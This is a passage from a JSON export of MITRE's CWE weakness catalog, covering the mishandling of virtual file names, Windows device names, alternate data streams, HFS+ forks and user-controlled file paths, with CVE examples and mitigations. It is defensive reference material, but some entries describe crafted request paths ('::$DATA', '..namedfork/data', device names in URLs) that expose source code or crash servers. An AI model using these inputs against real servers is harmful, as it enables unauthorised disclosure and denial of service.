Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"66":{"attr":{"@_ID":"66","@_Name":"Improper Handling of File Names that Identify Virtual Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not handle or incorrectly handles a file name that identifies a \\"virtual\\" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file.","Extended_Description":"Virtual file names are represented like normal file names, but they are effectively aliases for other resources that do not behave like normal files. Depending on their functionality, they could be alternate entities. They are not necessarily listed in directories.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Virtual Files"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Virtual Files","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle File Names that Identify Virtual Resources","attr":{"@_Date":"2009-03-10"}}]}},"67":{"attr":{"@_ID":"67","@_Name":"Improper Handling of Windows Device Names","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file.","Extended_Description":"Not properly handling virtual filenames (e.g. AUX, CON, PRN, COM1, LPT1) can result in different types of vulnerabilities. In some cases an attacker can request a device via injection of a virtual filename in a URL, which may cause an error that leads to a denial of service or an error page that reveals sensitive information. A software system that allows device names to bypass filtering runs the risk of an attacker injecting malicious code in a file with the name of a device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Historically, there was a bug in the Windows operating system that caused a blue screen of death. Even after that issue was fixed DOS device names continue to be a factor."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Other"],"Impact":["DoS: Crash, Exit, or Restart","Read Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be familiar with the device names in the operating system where your system is deployed. Check input for these device names."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0106","Description":"Server allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0106"},{"Reference":"CVE-2002-0200","Description":"Server allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200"},{"Reference":"CVE-2002-1052","Description":"Product allows remote attackers to use MS-DOS device names in HTTP requests to cause a denial of service or obtain the physical path of the server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1052"},{"Reference":"CVE-2001-0493","Description":"Server allows remote attackers to cause a denial of service via a URL that contains an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493"},{"Reference":"CVE-2001-0558","Description":"Server allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558"},{"Reference":"CVE-2000-0168","Description":"Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the \\"DOS Device in Path Name\\" vulnerability.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0168"},{"Reference":"CVE-2001-0492","Description":"Server allows remote attackers to determine the physical path of the server via a URL containing MS-DOS device names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0492"},{"Reference":"CVE-2004-0552","Description":"Product does not properly handle files whose names contain reserved MS-DOS device names, which can allow malicious code to bypass detection when it is installed, copied, or executed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552"},{"Reference":"CVE-2005-2195","Description":"Server allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2195"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows MS-DOS device names"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO32-C","Entry_Name":"Do not perform operations on devices that are only appropriate for files","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Device Files&#34;, Page 666"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows MS-DOS Device Names","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows Device Names","attr":{"@_Date":"2009-03-10"}}]}},"69":{"attr":{"@_ID":"69","@_Name":"Improper Handling of Windows ::DATA Alternate Data Stream","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly prevent access to, or detect usage of, alternate data streams (ADS).","Extended_Description":"An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and \'dir\' at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation","Other"],"Impact":["Bypass Protection Mechanism","Hide Activities","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Software tools are capable of finding ADSs on your system."},{"Phase":"Implementation","Description":"Ensure that the source code correctly parses the filename to read or write to the correct stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0278","Description":"In IIS, remote attackers can obtain source code for ASP files by appending \\"::$DATA\\" to the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278"},{"Reference":"CVE-2000-0927","Description":"Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0927"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows ::DATA alternate data stream"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-562"}},{"attr":{"@_External_Reference_ID":"REF-7"}}]},"Notes":{"Note":{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Windows ::DATA Alternate Data Stream","attr":{"@_Date":"2010-12-13"}}]}},"71":{"attr":{"@_ID":"71","@_Name":"DEPRECATED: Apple \'.DS_Store\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated as it represents a specific observed example of a UNIX Hard Link weakness type rather than its own individual weakness type. Please refer to CWE-62.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Observed_Examples, Relationships, Research_Gaps, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Apple \'.DS_Store\'","attr":{"@_Date":"2017-11-08"}}}},"72":{"attr":{"@_ID":"72","@_Name":"Improper Handling of Apple HFS+ Alternate Data Stream Path","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system.","Extended_Description":"If the software chooses actions to take based on the file name, then if an attacker provides the data or resource fork, the software may take unexpected actions. Further, if the software intends to restrict access to a file, then an attacker might still be able to bypass intended access restrictions by requesting the data or resource fork for that file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"66","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"macOS","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["The Apple HFS+ file system permits files to have multiple data input streams, accessible through special paths. The Mac OS X operating system provides a way to access the different data input streams through special paths and as an extended attribute:","Additionally, on filesystems that lack native support for multiple streams, the resource fork and file metadata may be stored in a file with \\"._\\" prepended to the name.","Forks can also be accessed through non-portable APIs.","Forks inherit the file system access controls of the file they belong to.","Programs need to control access to these paths, if the processing of a file system object is dependent on the structure of its path."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- Resource fork: file/..namedfork/rsrc, file/rsrc (deprecated), xattr:com.apple.ResourceFork","- Data fork: file/..namedfork/data (only versions prior to Mac OS X v10.5)"]}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A web server that interprets FILE.cgi as processing instructions could disclose the source code for FILE.cgi by requesting FILE.cgi/..namedfork/data. This might occur because the web server invokes the default handler which may return the contents of the file."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1084","Description":"Server allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1084"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-578"}}},"Notes":{"Note":[{"#text":"This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-studied","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"David Remahl","Modification_Organization":"Apple","Modification_Date":"2008-11-05","Modification_Comment":"clarified description, provided background details, and added demonstrative example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Apple HFS+ Alternate Data Stream","attr":{"@_Date":"2008-11-24"}},{"#text":"Failure to Handle Apple HFS+ Alternate Data Stream Path","attr":{"@_Date":"2009-05-27"}}]}},"73":{"attr":{"@_ID":"73","@_Name":"External Control of File Name or Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows user input to control or influence paths or file names that are used in filesystem operations.","Extended_Description":{"xhtml:p":["This could allow an attacker to access or modify system files or other files that are critical to the application.","Path manipulation errors occur when the following two conditions are met:","For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. An attacker can specify a path used in an operation on the filesystem.","2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Often"}},{"attr":{"@_Class":"macOS","@_Prevalence":"Often"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Files or Directories","Modify Files or Directories"],"Note":"The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands"],"Note":"The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)"],"Note":"The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap provide this capability."},{"Phase":["Architecture and Design","Operation"],"Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the 